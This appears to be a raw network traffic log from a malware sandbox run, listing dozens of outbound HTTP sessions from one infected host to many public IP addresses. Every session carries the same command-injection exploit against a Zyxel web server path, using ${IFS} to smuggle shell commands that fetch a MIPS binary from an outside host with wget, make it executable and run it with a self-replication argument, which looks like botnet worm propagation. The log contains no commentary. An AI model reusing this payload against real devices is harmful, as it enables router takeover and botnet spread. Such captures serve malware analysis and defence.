                                                Jan 29, 2024 07:07:58.551968098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7082192.168.2.2350124105.174.146.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551985025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7083192.168.2.2356230182.16.76.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552062035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7084192.168.2.2353230139.187.124.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552068949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7085192.168.2.235710420.160.159.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552117109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7086192.168.2.2343360148.221.171.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552164078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7087192.168.2.233805035.154.156.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552198887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7088192.168.2.234525449.104.113.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552259922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7089192.168.2.235018292.4.108.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552299023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7090192.168.2.235995257.122.70.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552373886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7091192.168.2.2348094211.39.186.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552381992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7092192.168.2.234869294.16.251.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552436113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7093192.168.2.233773425.184.211.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552488089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7094192.168.2.2357414135.170.198.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552514076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7095192.168.2.2344868103.34.22.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552557945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7096192.168.2.2343808220.31.7.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552577019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7097192.168.2.2354134102.19.186.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552644968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7098192.168.2.233833469.70.252.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552664995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7099192.168.2.23499949.195.4.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552694082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7100192.168.2.2344586149.181.68.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552722931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7101192.168.2.2349938217.217.141.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552763939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7102192.168.2.2353240169.54.241.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552772999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7103192.168.2.2333914112.52.110.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552805901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7104192.168.2.234387837.144.121.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.552846909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7105192.168.2.235609245.199.126.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.553180933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7106192.168.2.235087840.17.102.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.563718081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7107192.168.2.2343852139.33.172.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.563760042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7108192.168.2.235734297.235.131.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.563802004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7109192.168.2.234397888.81.197.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.563859940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7110192.168.2.2349188173.89.194.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.563920021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7111192.168.2.233388894.153.57.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.563940048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7112192.168.2.2351482197.96.131.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.563983917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7113192.168.2.2348250189.108.66.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564022064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7114192.168.2.234983247.196.250.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564069986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7115192.168.2.2335688140.51.198.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564086914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7116192.168.2.2344942189.59.247.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564140081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7117192.168.2.2354262103.54.229.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564186096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7118192.168.2.2345296201.114.172.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564228058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7119192.168.2.233647450.128.170.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564284086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7120192.168.2.233497683.247.141.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564321995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7121192.168.2.235460288.229.207.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564346075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7122192.168.2.2342134148.221.50.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564393044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7123192.168.2.2335244189.104.64.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564440012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7124192.168.2.234505685.198.174.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564486980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7125192.168.2.233684650.87.93.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564544916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7126192.168.2.234739681.80.26.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564563990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7127192.168.2.235567447.70.177.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564606905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7128192.168.2.2341822128.171.200.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564640999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7129192.168.2.2360308116.40.201.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564675093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7130192.168.2.2350170221.18.237.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564733028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7131192.168.2.233311617.198.71.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564770937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7132192.168.2.2337162161.58.82.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564798117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7133192.168.2.233312894.89.58.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564835072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7134192.168.2.2357818145.209.81.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564874887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7135192.168.2.235878025.195.225.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564939976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7136192.168.2.2341238115.122.71.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564975977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7137192.168.2.23522742.189.93.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.564984083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7138192.168.2.234086248.253.170.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565020084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7139192.168.2.234553636.77.117.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565068960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7140192.168.2.236008435.240.114.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565109015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7141192.168.2.2334178107.57.193.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565166950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7142192.168.2.234720641.160.168.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565198898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7143192.168.2.235059845.174.73.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565238953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7144192.168.2.2349352208.165.255.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565299034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7145192.168.2.235842078.223.227.13443
                                                TimestampBytes transferredDirectionData
